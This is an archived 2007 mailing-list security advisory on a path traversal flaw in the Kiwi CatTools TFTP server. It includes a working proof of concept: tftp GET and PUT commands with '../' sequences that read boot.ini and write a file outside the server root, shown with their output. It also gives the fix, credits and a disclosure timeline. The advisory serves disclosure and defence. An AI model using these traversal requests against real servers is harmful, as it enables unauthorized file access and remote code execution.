lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-Id: <200702271047.l1RAltrP052878@ic1.icecube.ru>
Date: Tue, 27 Feb 2007 13:47:17 -0800
From: "noreply" <noreply@...ecurity.ru>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: Kiwi CatTools TFTP server path traversal

Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
server can lead to information disclosure and remote code execution

Risk: High

DISCUSSION


Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET
request which can be used to download/upload any file from/to server.
Default setting allows replacing of existing files. Such settings lead to
probability to replace an executable files and run code on attacker choice. 

EXAMPLES

C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt

Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type boot.txt

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt

Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type pttest.txt

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>

 

SOLUTION

 

Upgrade to CatTools 3.2.9 which is available for download at
<http://www.kiwisyslog.com/downloads.php>
http://www.kiwisyslog.com/downloads.php

 

 

CREDITS

 

Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

DISCLOSURE TIMELINE

 

Vulnerability discovered:           11/20/2006

Initial vendor contact:                12/08/2006

Patch released:                         02/13/2007

Public disclosure:                      02/27/2007

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ